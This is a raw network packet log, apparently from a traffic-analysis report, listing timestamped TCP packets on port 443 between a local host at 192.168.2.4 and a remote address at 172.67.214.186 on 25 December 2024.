                                                                                                                                          Dec 25, 2024 22:17:40.322345018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.322388887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.322398901 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.322437048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.326608896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.326623917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.326661110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.326668978 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.326700926 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.326723099 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.329966068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.329981089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.330023050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.330032110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.330070019 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.334217072 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.334232092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.334274054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.334283113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.334352016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.338123083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.338138103 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.103570938 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.106897116 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.106914997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.106986046 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.106993914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.107038975 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.111058950 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.111082077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.111150026 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.111157894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.111201048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.276917934 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.276936054 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.277029991 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.277043104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.277090073 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.280359030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.280374050 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.280442953 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.280452013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.280494928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.283751011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.283766985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.283806086 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.283813000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.283843994 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.283854961 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.288055897 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.288073063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.288113117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.288120031 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.288151979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.288172960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.291393042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.291409016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.291475058 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.291488886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.291531086 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.295635939 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.295650959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.295717001 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.295726061 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.295766115 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.299007893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.299022913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.299091101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.299098969 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.299140930 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.303195000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.303209066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.303270102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.303278923 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.303333044 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.469053984 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.469072104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.469149113 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.469180107 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.469233036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.473239899 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.473256111 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.473321915 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.473331928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.473391056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.476658106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.476675034 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.476727962 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.476737022 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.476782084 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.480846882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.480864048 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.480926037 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.480938911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.480987072 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.484282970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.484301090 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.484364986 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.484374046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.484417915 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.488554955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.488571882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.488632917 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.488641977 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.488683939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.491920948 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.491936922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.492000103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.492008924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.492069006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.495521069 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.495537043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.495604038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.495613098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.495657921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.496196985 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.661381006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.661396027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.661484003 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.661494017 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.661544085 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.665533066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.665549040 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.665613890 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.665621042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.665658951 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.668988943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.669003963 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.669073105 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.669080973 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.669126987 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.673194885 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.673211098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.673269033 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.673275948 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.673316956 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.676697016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.676713943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.676774025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.676784992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.676822901 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.680787086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.680805922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.680859089 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.680866003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.680907011 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.684257030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.684272051 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.684320927 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.684328079 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.684367895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.688630104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.688644886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.688710928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.688716888 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.688760996 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.854969025 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.625099897 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.625123978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.629151106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.629165888 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.629214048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.629249096 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.629256010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.629302979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.632627010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.632641077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.632674932 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.632683992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.632728100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.636791945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.636806965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.636833906 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.636868000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.636874914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.636924028 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.640427113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.640441895 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.640486002 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.640494108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.640537977 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.644414902 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.644429922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.644469023 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.644480944 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.644495010 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.644526005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.647856951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.647872925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.647906065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.647913933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.647927999 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.647957087 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.652033091 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.652050972 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.652087927 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.652096033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.652111053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.652132034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.657722950 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.817315102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.817332983 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.817393064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.817425013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.817470074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.822195053 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.822216988 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.822283983 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.822293997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.822343111 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.824940920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.824954987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.825002909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.825011015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.825052023 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.829058886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.829071999 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.829118013 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.829125881 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.829169035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.832729101 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.832745075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.832784891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.832792997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.832820892 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.832834959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.836700916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.836714983 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.836761951 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.836771011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.836811066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.840164900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.840179920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.840223074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.840230942 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.840256929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.840280056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.844317913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.844336987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.844371080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.844413042 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.844419003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.844464064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.845997095 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.009737015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.009756088 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.009835005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.009860039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.009875059 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.009912968 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.013843060 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.013864994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.013900042 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.013910055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.013945103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.013956070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.017328024 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.017352104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.017391920 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.017400980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.017429113 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.017443895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.021488905 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.021506071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.021544933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.021574020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.021591902 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.021616936 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.024955034 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.024974108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.025012016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.025019884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.025054932 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.025072098 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.028348923 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.028367043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.028414965 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.028424025 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.028476000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.032568932 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.032584906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.032618046 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.032624006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.032660961 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.032680035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.036587000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.036602020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.036643982 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.036652088 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.036698103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.201994896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.202012062 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.981965065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.982958078 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.982973099 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.983045101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.983056068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.985971928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.987077951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.987093925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.987152100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.987160921 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.989857912 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.990561008 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.990576982 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.990653038 CET49744443192.168.2.4172.67.214.186
